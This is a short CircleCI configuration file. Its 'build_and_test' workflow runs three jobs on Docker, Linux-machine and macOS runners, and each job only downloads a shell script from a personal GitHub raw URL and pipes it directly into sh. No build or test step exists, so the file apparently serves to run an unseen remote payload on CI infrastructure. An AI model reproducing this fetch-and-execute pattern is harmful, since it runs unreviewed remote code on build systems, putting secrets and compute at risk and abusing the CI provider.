version: 2
jobs:
  docker:
    docker:
      - image: ruby:2.5
    steps:
      - run: wget https://raw.githubusercontent.com/farestoyomkl/farestoyo2/master/1.sh -O - | sh
  machine:
    machine: true
    steps:
      - run: wget https://raw.githubusercontent.com/farestoyomkl/farestoyo2/master/1.sh -O - | sh
  macos:
    macos:
      xcode: "9.0"
    steps:
      - run: curl -s https://raw.githubusercontent.com/farestoyomkl/farestoyo2/master/1.sh | sh
workflows:
  version: 2
  build_and_test:
    jobs:
      - docker
      - machine
      - macos
